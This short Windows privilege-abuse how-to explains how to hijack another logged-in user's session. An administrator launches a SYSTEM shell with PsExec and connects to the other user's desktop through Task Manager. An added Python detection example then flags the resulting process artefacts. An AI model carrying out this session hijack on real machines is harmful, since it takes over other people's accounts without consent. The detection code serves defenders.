Purpose: To hijack a local Windows session (any user)
Requirements: Local administrator rights
Even with administrator rights, you cannot directly impersonate (or hijack) another user's session. With this attack you gain full control over a locally logged-in user's account.
Download Sysinternals' PsExec tool from here. Extract it to a folder of your choice and launch an elevated command prompt:
> cd C:\SysinternalsSuite
> PsExec.exe -i -s cmd.exe

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Switch to the newly launched command prompt, which runs as SYSTEM:
> whoami
nt authority\system
> taskmgr
In Task Manager, select the logged-in user and connect to that user's desktop.
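From the defender's side, the procedure above leaves two artefacts in process-creation telemetry: an interactive shell whose parent is the PsExec service binary (PSEXESVC.exe), and Task Manager running as SYSTEM. The following is an added detection example, not part of the original page; it runs over constructed records shaped like Sysmon Event ID 1 fields (Image, ParentImage, User), and the sample paths and record ids are assumptions.

```python
# Added detection example (not part of the original how-to). It scans
# constructed process-creation records shaped like Sysmon Event ID 1 fields
# for the two artefacts the PsExec session-hijack leaves behind.
import ntpath

SYSTEM = "nt authority\\system"  # matches the whoami output above


def _base(path: str) -> str:
    """Lower-cased file name of a Windows image path (works on any OS)."""
    return ntpath.basename(path).lower()


def classify(ev: dict) -> list:
    """Return the detection labels a single process-creation event matches."""
    hits = []
    image, parent = _base(ev["Image"]), _base(ev["ParentImage"])
    user = ev["User"].lower()
    # PsExec -s runs its child under the PSEXESVC service, so a SYSTEM shell
    # whose parent is PSEXESVC.exe is the first artefact.
    if parent == "psexesvc.exe" and image in ("cmd.exe", "powershell.exe") and user == SYSTEM:
        hits.append("psexec_system_shell")
    # Task Manager is normally launched by the interactive user, never by SYSTEM.
    if image == "taskmgr.exe" and user == SYSTEM:
        hits.append("taskmgr_as_system")
    return hits


def scan(events: list) -> list:
    """Return (RecordId, label) pairs for every matching event, in order."""
    return [(ev["RecordId"], label) for ev in events for label in classify(ev)]


# Constructed sample events; only records 2 and 3 reproduce the technique.
SAMPLE_EVENTS = [
    {"RecordId": 1, "Image": r"C:\Windows\System32\taskmgr.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\alice"},
    {"RecordId": 2, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\PSEXESVC.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"RecordId": 3, "Image": r"C:\Windows\System32\taskmgr.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "User": r"NT AUTHORITY\SYSTEM"},
    {"RecordId": 4, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"CORP\alice"},
]

if __name__ == "__main__":
    for rec, label in scan(SAMPLE_EVENTS):
        print(f"record {rec}: {label}")
```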